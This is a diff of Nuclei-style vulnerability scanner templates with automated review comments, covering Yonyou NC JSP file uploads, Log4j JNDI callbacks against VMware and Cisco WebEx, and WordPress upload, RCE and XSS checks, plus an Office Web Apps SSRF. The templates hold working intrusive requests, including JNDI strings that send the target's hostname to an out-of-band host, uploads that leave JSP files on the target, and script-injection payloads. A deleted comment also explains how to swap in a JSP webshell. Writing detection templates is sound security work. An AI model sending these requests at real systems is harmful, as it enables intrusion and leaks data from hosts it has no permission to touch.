+ - https://github.com/lal0ne/vulnerability/blob/c0985107adfd91d85fbd76d9a8acf8fbfa98ed41/YonyouNC/ncDecode/README.md
+ metadata:
+ verified: true
+ max-request: 2
+ fofa-query: icon_hash="1085941792"
+ tags: yonyou,intrusive,fileupload
+
+http:
+ - raw:
+ - |
+ POST /ServiceDispatcherServlet HTTP/1.1
+ Content-Type: application/data
+ Host: {{Hostname}}
+ Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
+
+ {{hex_decode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}}
+ - |
+ GET /ncupload/n2d19a.jsp HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers-condition: and
+ matchers:
+ - type: dsl
+ dsl:
+ - "status_code_1 == 200"
+ - "status_code_2 == 200 && contains(body_2,'just_a_test')"
+ condition: and
+
+# digest: 4b0a00483046022100b133fa848f0dfa29959a4593e87849235eec2ba638a6b83ab7726c39748bb592022100b4ef8f4f815d5b12f118f5770b9b7dee0d102fa7942007358ba698c3ac5d932d:922c64590222798bb761d5b6d8e72950
diff --git a/poc/upload/yonyou-nc-grouptemplet-fileupload.yaml b/poc/upload/yonyou-nc-grouptemplet-fileupload.yaml
old mode 100644
new mode 100755
index 13f1632625..06d784f482
--- a/poc/upload/yonyou-nc-grouptemplet-fileupload.yaml
+++ b/poc/upload/yonyou-nc-grouptemplet-fileupload.yaml
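Review bot: The second request fetches a fixed path, `/ncupload/n2d19a.jsp`, and matches on the fixed marker `just_a_test`, so a hit cannot be tied to this run: the same file left behind by an earlier scan, or by someone else, satisfies the matcher, and the template itself leaves that file on every host it confirms. If the serialized body allows it, a per-run `{{randstr}}` name and marker, as the other upload templates in this commit use, would make the match specific; either way the description should say that an existing `/ncupload/n2d19a.jsp` is itself worth triaging as a sign of prior activity. `status_code_1 == 200` on its own contributes nothing to the verdict. As rendered here the request body is a `hex_decode` call whose argument has been elided, so the template is not loadable in this form.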
@@ -1,51 +1,45 @@ id: yonyou-nc-grouptemplet-fileupload info: - name: 用友nc grouptemplet接口任意文件上传 - author: pphua + name: UFIDA NC Grouptemplet Interface - Unauthenticated File Upload + author: SleepingBag945 severity: critical - tags: yonyou,fileupload,nc - reference: - - https:// + description: | + The UFIDA NC Grouptemplet Interface permits unauthenticated users to upload potentially malicious files. + reference: + - https://www.seebug.org/vuldb/ssvid-99547 + - https://github.com/Augensternyu/POC-bomber/blob/main/pocs/redteam/yongyou_nc_fileupload_2022.py metadata: - max-request: 2 verified: true - fofa-query: title="YONYOU NC" - + max-request: 2 + fofa-query: app="用友-UFIDA-NC + tags: yonyou,intrusive,ufida,fileupload variables: - v1: '{{rand_base(5)}}' + v1: "{{rand_int(1,100)}}" http: - raw: - - | - POST /uapim/upload/grouptemplet?groupid={{v1}}&fileType=txt HTTP/1.1 + - | + POST /uapim/upload/grouptemplet?groupid={{v1}}&fileType=jsp HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryikyyjlra - Accept-Encoding: gzip + Content-type: multipart/form-data; boundary=----------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7 - ------WebKitFormBoundaryikyyjlra - Content-Disposition: form-data; name="upload"; filename="{{v1}}.txt" + ------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7 + Content-Disposition: form-data; name="upload"; filename="{{randstr_1}}.jsp" Content-Type: application/octet-stream - {{randstr}} - ------WebKitFormBoundaryikyyjlra - Content-Disposition: form-data; name="submit" - - submit - ------WebKitFormBoundaryikyyjlra-- - + <%out.println("{{randstr_2}}");%> + ------------Ef1KM7GI3Ef1ei4Ij5ae0KM7cH2KM7-- - | - GET /uapim/static/pages/{{v1}}/head.txt HTTP/1.1 - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 + GET /uapim/static/pages/{{v1}}/head.jsp HTTP/1.1 + Host: {{Hostname}} + matchers-condition: and matchers: - type: 
dsl dsl: - "status_code_1 == 200" - - "status_code_2 == 200 && contains((body_2), '{{randstr}}')" + - "status_code_2 == 200 && contains(body_2,'{{randstr_2}}')" condition: and -# 利用方式:只需将第一个请求包中的fileType=txt 修改为 fileType=jsp,并将内容修改为jsp马子即可 -# 注意:所有上传的文件名称都为head -# 上传的地址: http://x.x.x.x/uapim/static/pages/{{v1}}/head.jsp v1代表poc随机生成的uid,可使用-debug参数查看http数据包 \ No newline at end of file +# digest: 4a0a0047304502202c766a3202a46060a829d4b89895ae36490c268ec1e79e7ccd4ef68904687d2d022100ad6cdfb33e6377226c2903589eac7542d06e8be63c8e077a8471ab59ad1a8f25:922c64590222798bb761d5b6d8e72950 diff --git a/poc/vmware/vmware-operation-manager-log4j.yaml b/poc/vmware/vmware-operation-manager-log4j.yaml index f589100224..8c90ad185b 100644 --- a/poc/vmware/vmware-operation-manager-log4j.yaml +++ b/poc/vmware/vmware-operation-manager-log4j.yaml @@ -15,11 +15,16 @@ info: cve-id: CVE-2021-44228 cwe-id: CWE-77 metadata: + max-request: 1 shodan-query: title:"vRealize Operations Manager" verified: "true" - tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast + tags: blind,fuzzing -requests: +variables: + rand1: '{{rand_int(111, 999)}}' + rand2: '{{rand_int(111, 999)}}' + +http: - raw: - | POST /ui/login.action HTTP/1.1 @@ -32,7 +37,7 @@ requests: Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin - mainAction=login&userName=${jndi:ldap://${sys:os.name}.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us + mainAction=login&userName=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}}&password=admin&authSourceId=localItem&authSourceName=Local%20Users&authSourceType=LOCAL&forceLogin=&timezone=330&languageCode=us matchers-condition: and matchers: 
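Review bot: `fofa-query: app="用友-UFIDA-NC` is missing its closing quote; YAML accepts the bare scalar, so nothing fails at load time, but the query is malformed. `v1: "{{rand_int(1,100)}}"` gives only a hundred possible `groupid` directories and the upload always lands as `head.jsp`, so `/uapim/static/pages/{{v1}}/head.jsp` may already exist from an earlier run; the `{{randstr_2}}` marker keeps the verdict correct, but the file is never removed, and the fact that every upload is named `head` (documented in the Chinese comments this commit deletes) belongs in the new description. The `old mode 100644`/`new mode 100755` change marks a YAML file executable, presumably by accident.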
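Review bot: `tags: blind,fuzzing` replaces `tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast`, dropping every tag that `-tags`/`-etags` selection and the usual `oast` exclusion rely on, while the info block still declares `cve-id: CVE-2021-44228` and the request still needs an interactsh server. Merge rather than replace: `tags: cve,cve2021,rce,jndi,log4j,vmware,kev,oast,blind,fuzzing`. The new `${hostName}` lookup puts the target's hostname into the callback name; a sentence in the description would tell whoever reads the interactsh log what that label is. The `http:` block this hunk starts continues past the hunk.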
@@ -44,7 +49,7 @@ requests: - type: regex part: interactsh_request regex: - - '([a-zA-Z0-9.-]+).([a-z0-9]+).([a-z0-9]+).\w+' # Match for extracted ${sys:os.name} variable + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output - type: word part: header @@ -56,8 +61,14 @@ requests: kval: - interactsh_ip # Print remote interaction IP in output + - type: regex + part: interactsh_request + group: 2 + regex: + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output + - type: regex part: interactsh_request group: 1 regex: - - '([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${sys:os.name} in output + - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output diff --git a/poc/web/chatgpt-web-unauth.yaml b/poc/web/chatgpt-web-unauth.yaml index e013627b64..022ec62b2a 100644 --- a/poc/web/chatgpt-web-unauth.yaml +++ b/poc/web/chatgpt-web-unauth.yaml @@ -4,6 +4,7 @@ info: name: ChatGPT Web - Unauthorized Access author: SleepingBag945 severity: high + description: ChatGPT Web is exposed. metadata: verified: true max-request: 1 @@ -37,5 +38,4 @@ http: - type: status status: - 200 - -# digest: 490a00463044022025e67a1afa68039433f2eeb68afb01b6cefcf700d2976a83d01845f87a2cfcf902204c852c5d7b15d180a10864001521e703eddde47ab3722d0090b6bfbf62f4b3f5:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a004730450221009335765c3a461281c6686e5525ef4df6ad033b509221998c003f467783efccbe022002fed2ad57b70a38346af4229f8309b5d16a21de09c245e1af3638f9d0086475:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/web/cisco-webex-log4j-rce.yaml b/poc/web/cisco-webex-log4j-rce.yaml new file mode 100644 index 0000000000..ab879def50 --- /dev/null +++ b/poc/web/cisco-webex-log4j-rce.yaml 
@@ -0,0 +1,66 @@
+id: cisco-webex-log4j-rce
+
+info:
+ name: Cisco WebEx - Remote Code Execution (Apache Log4j)
+ author: shaikhyaser
+ severity: critical
+ description: |
+ Cisco WebEx is susceptible to Log4j JNDI remote code execution. Cisco WebEx provides web conferencing, videoconferencing and contact center as a service applications.
+ reference:
+ - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+ cvss-score: 10
+ cve-id: CVE-2021-44228
+ cwe-id: CWE-77
+ metadata:
+ max-request: 1
+ shodan-query: title:"Cisco WebEx"
+ tags: cve,cve2021,rce,jndi,log4j,cisco,webex,oast,kev
+variables:
+ rand1: '{{rand_int(111, 999)}}'
+ rand2: '{{rand_int(111, 999)}}'
+ str: "{{rand_base(5)}}"
+
+http:
+ - raw:
+ - |
+ POST /orion/login?siteurl=meet HTTP/1.1
+ Host: {{Hostname}}
+ Origin: {{RootURL}}
+ Referer: {{RootURL}}/orion/login?siteurl=meet&rnd=0.1359184728177283
+ X-Requested-With: XMLHttpRequest
+ Content-Type: application/x-www-form-urlencoded
+
+ type=getFailureTimes&username=${jndi:ldap://${:-{{rand1}}}${:-{{rand2}}}.${hostName}.username.{{interactsh-url}}/{{str}}}&bAjax=true
+
+ matchers-condition: and
+ matchers:
+ - type: word
+ part: interactsh_protocol # Confirms the DNS Interaction
+ words:
+ - "dns"
+
+ - type: regex
+ part: interactsh_request
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
+
+ extractors:
+ - type: kval
+ kval:
+ - interactsh_ip # Print remote interaction IP in output
+
+ - type: regex
+ group: 2
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print injection point in output
+ part: interactsh_request
+
+ - type: regex
+ group: 1
+ regex:
+ - '\d{6}\.([a-zA-Z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted
${:-{{rand1}}}${:-{{rand2}}}.${hostName} in output
+ part: interactsh_request
+
+# digest: 4a0a00473045022042bdc493eb4ec91bbcbcd56ef58972f45032f56c91a340ccc75e523f1953badf022100b70c8852cc0ae3850e5574cc27f06e2eaed76319f53bbb9e1cfe7a4061bd3640:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/cvsweb-detect.yaml b/poc/web/cvsweb-detect.yaml
new file mode 100644
index 0000000000..3a94bf7c33
--- /dev/null
+++ b/poc/web/cvsweb-detect.yaml
@@ -0,0 +1,45 @@
+id: cvsweb-detect
+
+info:
+ name: CVSweb - Detect
+ author: lu4nx
+ severity: info
+ description: |
+ CVSweb is a WWW interface for CVS repositories with which you can browse a file hierarchy on your browser to view each file's revision history in a very handy manner.
+ reference:
+ - https://cvsweb.openbsd.org/
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: title:"cvsweb"
+ fofa-query: title="cvsweb"
+ zoomeye-query: title:cvsweb
+ tags: tech,cvsweb,detect
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}"
+
+ host-redirects: true
+ max-redirects: 2
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'content=".*CVSweb.*"'
+
+ - type: status
+ status:
+ - 200
+
+ extractors:
+ - type: regex
+ part: body
+ group: 1
+ regex:
+ - 'content=".*CVSweb\s*([0-9.]+)"'
+
+# digest: 490a0046304402205edaaf4869f5e99128f50d300e222b62e3ff929787c084f7271cd034d9b450f502201f253ad5141e8777d354f91ae7cbe61e6a7d08b2a944d9c2cd1b5e30c6ca3b01:922c64590222798bb761d5b6d8e72950
diff --git a/poc/web/element-web-detect.yaml b/poc/web/element-web-detect.yaml
new file mode 100644
index 0000000000..ad7b412929
--- /dev/null
+++ b/poc/web/element-web-detect.yaml
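Review bot: Both matchers only establish that a `dns` interaction with the expected label shape arrived, which shows the JNDI string was evaluated far enough to resolve a name, not that any code ran; the `name` and `description` nevertheless say "Remote Code Execution" without that caveat, and there is no `remediation` pointing at the fixed builds the linked Cisco advisory lists. A sentence such as `Confirmation is via DNS callback only; a hit shows the lookup was evaluated, not that a payload executed.` in the description, plus a `remediation:` line, would help triage. The hunk ends on this line; the cvsweb hunk that follows it raises nothing.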
@@ -0,0 +1,36 @@
+id: element-web-detect
+
+info:
+ name: Element Web - Detect
+ author: davidegirardi
+ severity: info
+ description: Identify if a web application is vanilla Element Web and return the version
+ metadata:
+ verified: true
+ max-request: 2
+ shodan-query: html:"manifest.json"
+ tags: tech,matrix,element,detect
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/manifest.json"
+ - "{{BaseURL}}/version"
+
+ host-redirects: true
+ max-redirects: 2
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code_1 == 200'
+ - 'contains(content_type_1, "application/json")'
+ - 'contains(json_minify(body_1), "\"name\":\"Element\"")'
+ - 'status_code_2 == 200'
+ condition: and
+
+ extractors:
+ - type: regex
+ part: body
+ regex:
+ - '[^\s]+'
+# digest: 4a0a0047304502205410e006bfb51302b79c929988e99705a9fbdcba4f23221cad2c63bc02dc59ce022100ac77e3d22cc46dff3d215d2850f5349cc77bc9ca0700279ee10455163a4795b1:922c64590222798bb761d5b6d8e72950
\ No newline at end of file
diff --git a/poc/web/office-webapps-ssrf.yaml b/poc/web/office-webapps-ssrf.yaml
index 85231b0f37..dd69b267b1 100644
--- a/poc/web/office-webapps-ssrf.yaml
+++ b/poc/web/office-webapps-ssrf.yaml
@@ -4,6 +4,7 @@ info: name: Office Web Apps Server Full Read - Server Side Request Forgery author: DhiyaneshDK severity: high + description: Office Web Apps Server Full Read is vulnerable to SSRF. reference: - https://drive.google.com/file/d/1aeNq_5wVwHRR1np1jIRQM1hocrgcZ6Qu/view (Slide 37,38) metadata:
@@ -19,7 +20,7 @@ variables: http: - raw: - | - GET /oh/wopi/files/@/wFileId/contents?wFileId=http://{{oast}}/{{string}}.xlsx%3fbody={{string}}%26header=Location:http://oast.pro%26status=302&access_token_ttl=0 HTTP/1.1 + GET /oh/wopi/files/@/wFileId/contents?wFileId=http://{{oast}}/{{string}}.xlsx%3fbody={{string}}%26header=Location:http://{{oast}}%26status=302&access_token_ttl=0 HTTP/1.1 Host: {{Hostname}} matchers:
@@ -29,5 +30,4 @@ http: - contains(body,'
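Review bot: The version extractor uses `part: body` with `[^\s]+` on a two-request template, which is ambiguous: if the unindexed `body` resolves to the first response, the extractor returns the opening token of `manifest.json` instead of the contents of `/version`. Pin it with `part: body_2`, consistent with the `body_1`/`status_code_2` indices the matcher already uses. The matcher also never checks that `/version` returned a plausible version string, so any 200 on that path passes; a `contains(content_type_2, "text/plain")` or a regex on `body_2` would tighten it.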

Interactsh Server

') - status_code == 200 condition: and - -# digest: 4a0a0047304502207e37c166b7939e67027a532a414b3ed954332b97d7a1ba9c8bc3ccf98c206614022100ba38deb6e2059ad4b76f56fae8b4f0accce143472e8c236e297c90365c1306c7:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a00473045022100cbf861ff659932311fdb82c1a1d21e84d62817b2c805bc12eaacfdc5501c384a022061b6723822f822862e2d6b48259339781dcca9bd883f6502676870b3a14a1f26:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/web/unauth-temporal-web-ui.yaml b/poc/web/unauth-temporal-web-ui.yaml index 29f3b9911a..5a81343763 100644 --- a/poc/web/unauth-temporal-web-ui.yaml +++ b/poc/web/unauth-temporal-web-ui.yaml @@ -15,7 +15,7 @@ info: verified: "true" max-request: 2 shodan-query: http.favicon.hash:557327884 - tags: temporal,unauth + tags: misconfig,temporal,unauth http: - method: GET @@ -34,5 +34,4 @@ http: - "contains(body_2, 'nextPageToken') && status_code_2 == 200" - "contains(body_2, 'Namespace default is not found.') && status_code_2 == 404" condition: or - -# digest: 4a0a00473045022100fd80f97bd588e2a7735fbc258ea5b50508f786384b74adc3fafac28f96e32d4602202bee503f1cf7a9ddf2e4c4227239a0475e77a562fbf8ced464bb9cdf0fd21cfa:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100e23471f799588e5121a981fa02bd8b1490449748125c06235ea2e1607e2439e3022100a92beae88b23261b448c696a9863d008afae153ea3759317a41ef9958c02e31e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/web/webcalendar-install.yaml b/poc/web/webcalendar-install.yaml index 7757f115a7..c45245cbec 100644 --- a/poc/web/webcalendar-install.yaml +++ b/poc/web/webcalendar-install.yaml @@ -4,6 +4,7 @@ info: name: WebCalendar Exposed Installation author: ritikchaddha severity: high + description: WebCalendar is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 
@@ -27,5 +28,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100e9426b7fb9f09e1d861e1b018d547d81ef7b1c7ec8aaa7162d69e549c799d54502201a5bbccf3045291af63667e7dd6cf2c1bd2af35bd6530ad7b2fe4969ffa9b9ca:922c64590222798bb761d5b6d8e72950 +# digest: 4a0a0047304502203f9f9d0530a6128882d754e1bf7bdf02d01b355f189a08b28daeb95a1f748c71022100cef8e90c908df68dc0f8289901f9eca3896612e38649ba5edf5058132bce0b5f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/web/webtrees-install.yaml b/poc/web/webtrees-install.yaml index f30af4277a..60f36908c1 100644 --- a/poc/web/webtrees-install.yaml +++ b/poc/web/webtrees-install.yaml @@ -4,6 +4,7 @@ info: name: WebTrees Exposed Installation author: ritikchaddha severity: high + description: WebTrees is susceptible to the Installation page exposure due to misconfiguration. metadata: verified: true max-request: 1 @@ -24,5 +25,4 @@ http: - type: status status: - 200 - -# digest: 4a0a00473045022100ea0af88ea06f5f77853b5cb6b6dce3053b7dbe060d10499ca5a0c5edf363a32e022068b3dde045e488cc3081c230b99c6f0b945a9e4222d9eade765ca6797e3d559e:922c64590222798bb761d5b6d8e72950 +# digest: 4b0a00483046022100ec41f6f8796153193b35d05f3bdb9b2581179314fc51bc115841bc202321b4ac022100beb0f0741344f7edbd03b32d0fac505b69af2fdb31f5d50a2819191aa8ad8725:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/poc/wordpress/wp-gallery-file-upload.yaml b/poc/wordpress/wp-gallery-file-upload.yaml new file mode 100644 index 0000000000..1459b7f9ce --- /dev/null +++ b/poc/wordpress/wp-gallery-file-upload.yaml 
@@ -0,0 +1,48 @@
+id: wp-gallery-file-upload
+
+info:
+ name: WordPress Plugin Gallery 3.06 - Arbitrary File Upload
+ author: r3Y3r53
+ severity: high
+ description: |
+ The Gallery by BestWebSoft WordPress plugin was affected by an Unauthenticated File Upload PHP Code Execution security vulnerability.
+ remediation: Fixed in version 3.1.1
+ reference:
+ - https://www.exploit-db.com/exploits/18998
+ - http://wordpress.org/extend/plugins/gallery-plugin/
+ - http://downloads.wordpress.org/plugin/gallery-plugin.3.06.zip
+ - https://wpscan.com/vulnerability/049c8518-1f52-4aa4-b0b3-218289727353
+ metadata:
+ verified: true
+ max-request: 2
+ publicwww-query: /wp-content/plugins/gallery-plugin/
+ google-query: inurl:/wp-content/plugins/gallery-plugin/
+ tags: wp,wp-plugin,wordpress,wpscan,file-upload,intrusive
+variables:
+ filename: "{{to_lower(rand_text_alpha(5))}}"
+
+http:
+ - raw:
+ - |
+ POST /wp-content/plugins/gallery-plugin/upload/php.php HTTP/1.1
+ Host: {{Hostname}}
+ Content-Type: multipart/form-data; boundary=WebKitFormBoundary20kgW2hEKYaeF5iP
+
+ --WebKitFormBoundary20kgW2hEKYaeF5iP
+ Content-Disposition: form-data; name="qqfile"; filename="{(unknown)}.png"
+
+ {{randstr}}
+
+ --WebKitFormBoundary20kgW2hEKYaeF5iP--
+ - |
+ GET /wp-content/plugins/gallery-plugin/upload/files/{(unknown)}.png HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'contains(content_type_1, "text/html") && contains(content_type_2, "image/png")'
+ - 'contains(body_1, "success:true") && contains(body_2, "{{randstr}}")'
+ condition: and
+
+# digest: 4a0a0047304502202a745722b545793e04182b1db3e42251980ddd30a3bf2d24a01e66f5835d48c3022100a51cc6736be76c352b14ba34112aee6f4c91b99534d7c684bb5a22aa8538f467:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-real-estate-xss.yaml b/poc/wordpress/wp-real-estate-xss.yaml
new file mode 100644
index 0000000000..812d486da6
--- /dev/null
+++ b/poc/wordpress/wp-real-estate-xss.yaml
@@ -0,0 +1,37 @@
+id: wp-real-estate-xss
+
+info:
+ name: WordPress Real Estate 7 Theme <= 3.3.4 - Cross-Site Scripting
+ author: Harsh
+ severity: medium
+ description: |
+ The Real Estate 7 premium theme for WordPress is vulnerable to Reflected Cross-Site Scripting (XSS) attack vector in versions up to, and including, v3.3.4 via the 'ct_additional_features' option due to insufficient input sanitization and output escaping. This vulnerability allows unauthenticated attackers to inject malicious JavaScript payload in the search page that execute if they can trick a user into performing an action such as clicking on a link.
+ reference:
+ - https://www.exploitalert.com/view-details.html?id=39344
+ - https://packetstormsecurity.com/files/171186/WordPress-Real-Estate-7-Theme-3.3.4-Cross-Site-Scripting.html
+ - https://themeforest.net/item/wp-pro-real-estate-7-responsive-real-estate-wordpress-theme/12473778
+ classification:
+ cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
+ cvss-score: 6.1
+ cwe-id: CWE-79
+ metadata:
+ verified: true
+ max-request: 1
+ publicwww-query: "/wp-content/themes/realestate-7/"
+ tags: packetstorm,wordpress,wp-theme,wp,xss,realestate
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/?ct_keyword=%22%3E%3Cimg%20src%3Dx%20onerror%3Dprompt%28document.domain%29%3E&ct_city=0&ct_state=0&ct_zipcode=0&search-listings=true&ct_property_type=0&ct_beds=0&ct_baths=0&ct_price_from&ct_price_to"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'contains(content_type, "text/html")'
+ - 'contains(body, "")'
+ - 'contains(body, "/wp-content/themes/realestate-7/")'
+ condition: and
+
+# digest: 4a0a0047304502206c539003b913a5aa84666f731c82c96bb3aec3f8fe23d82ea49a4f605525ecba022100de91aaf7c5e02ad1c794895f6017562d5a314e1fd3bf1e877253019f285191b3:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-social-warfare-rce.yaml b/poc/wordpress/wp-social-warfare-rce.yaml
new file mode 100644
index 0000000000..52d75c141e
--- /dev/null
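Review bot: The third DSL condition is `contains(body, "")`, and an empty needle is always true, so the verdict reduces to "a 200 HTML page that references `/wp-content/themes/realestate-7/`" and fires on every site running the theme whether or not anything is reflected; this looks like the reflected marker was lost (as rendered here, at least), and the same empty needle appears in the beyond-trust-xss hunk (`contains(body, "")`) and in the junos-xss hunk (`- ""`). The needle should be the exact text the page echoes back from `ct_keyword`, or a `{{randstr}}` included in that parameter, so a match proves reflection. Separately, the description attributes the issue to the `ct_additional_features` option while the request injects through `ct_keyword`; one of the two should be corrected.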
+++ b/poc/wordpress/wp-social-warfare-rce.yaml
@@ -0,0 +1,44 @@
+id: wp-social-warfare-rce
+
+info:
+ name: Social Warfare <= 3.5.2 - Remote Code Execution
+ author: theamanrawat
+ severity: critical
+ description: |
+ Unauthenticated remote code execution has been discovered in functionality that handles settings import.
+ remediation: Fixed in version 3.5.3
+ reference:
+ - https://wpscan.com/vulnerability/9259
+ - https://wordpress.org/plugins/social-warfare/
+ metadata:
+ verified: true
+ max-request: 1
+ publicwww-query: "/wp-content/plugins/social-warfare/"
+ tags: wordpress,wpscan,wp-plugin,wp,social-warfare,rce
+
+http:
+ - raw:
+ - |
+ GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url={{path}} HTTP/1.1
+ Host: {{Hostname}}
+
+ payloads:
+ path: helpers/payloads/wp-social-warfare-rce.txt
+
+ matchers-condition: and
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - 'root:.*:0:0:'
+
+ - type: word
+ part: body
+ words:
+ - 'No changes made'
+
+ - type: status
+ status:
+ - 500
+
+# digest: 4b0a00483046022100b422b9d2f6f7cb6f3086df500121ac639b2f4fc54cbc83b2ba41e8a26b0d4805022100e530bfee70cc44ac1a0c3e2097cecf0b1442c2f2093c923018d14de1c5d47353:922c64590222798bb761d5b6d8e72950
diff --git a/poc/wordpress/wp-superstorefinder-misconfig.yaml b/poc/wordpress/wp-superstorefinder-misconfig.yaml
new file mode 100644
index 0000000000..a1a731a66a
--- /dev/null
+++ b/poc/wordpress/wp-superstorefinder-misconfig.yaml
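Review bot: `payloads: path: helpers/payloads/wp-social-warfare-rce.txt` makes the template depend on a helper file that is not part of this diff; if it is absent from the repository the template fails to load, and if it holds more than one line the `max-request: 1` metadata is wrong, since each payload line is one request. The matchers confirm a `root:.*:0:0:` string in the body, i.e. a file read, while `name`/`description` claim code execution; a sentence in the description stating what the template actually verifies would keep the `critical` severity honest for triage.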
@@ -0,0 +1,33 @@
+id: wp-superstorefinder-misconfig
+
+info:
+ name: Superstorefinder WP-plugin - Security Misconfigurations
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Security misconfiguration is a common security issue that occurs when a system, application, or network is not properly configured to protect against threats and vulnerabilities.
+ reference:
+ - https://cxsecurity.com/issue/WLB-2021010145
+ - https://www.exploitalert.com/view-details.html?id=36983
+ metadata:
+ verified: true
+ max-request: 1
+ publicwww-query: /wp-content/plugins/superstorefinder-wp/
+ google-query: inurl:"wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php"
+ tags: wordpress,wp-plugin,superstorefinder-wp,wp,misconfig
+
+http:
+ - raw:
+ - |
+ GET /wp-content/plugins/superstorefinder-wp/ssf-wp-admin/pages/exportAjax.php HTTP/1.1
+ Host: {{Hostname}}
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'contains(body, "Name") && contains(body, "CategoriesTags") && contains(body, "email")'
+ - 'contains(content_type, "text/html")'
+ condition: and
+
+# digest: 490a0046304402205624314a7fa843184b0006a4166011527395e568b8ad05b057c6736e989da9ba02200811b24c1e44539543fbb7c61236aa51bea06d2e84315390ed2377fb5f156f91:922c64590222798bb761d5b6d8e72950
diff --git a/poc/xss/beyond-trust-xss.yaml b/poc/xss/beyond-trust-xss.yaml
new file mode 100644
index 0000000000..06bb84947f
--- /dev/null
+++ b/poc/xss/beyond-trust-xss.yaml
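Review bot: The `description` is generic text about security misconfiguration and says nothing about what this template finds: an `exportAjax.php` page under `ssf-wp-admin/pages/` that answers without authentication with store records (the matcher keys on the `Name`, `CategoriesTags` and `email` columns). Suggest `description: The Super Store Finder plugin exposes ssf-wp-admin/pages/exportAjax.php without authentication, returning the store list including contact e-mail addresses.` and, if the referenced advisories name a fixed release, a `remediation:` line. `contains(body, "Name")` is a very common token; anchoring on the full header row would make the check more specific.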
@@ -0,0 +1,31 @@
+id: beyond-trust-xss
+
+info:
+ name: BeyondTrust Remote Support 6.0 - Cross-Site Scripting
+ author: r3Y3r53
+ severity: medium
+ description: |
+ Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.
+ reference:
+ - https://www.exploit-db.com/exploits/50632
+ metadata:
+ verified: true
+ max-request: 1
+ shodan-query: html:"BeyondTrust"
+ google-query: intext:"BeyondTrust" "Redistribution Prohibited"
+ tags: beyondtrust,xss,intrusive
+
+http:
+ - method: GET
+ path:
+ - "{{BaseURL}}/appliance/login?login[password]={{randstr}}%22%3E%3Csvg/onload=alert(document.domain)%3E&login[use_curr]=1&login[submit]=Change%20Password"
+
+ matchers:
+ - type: dsl
+ dsl:
+ - 'status_code == 200'
+ - 'contains(content_type, "text/html")'
+ - 'contains(body, "") && contains(body, "beyondtrust")'
+ condition: and
+
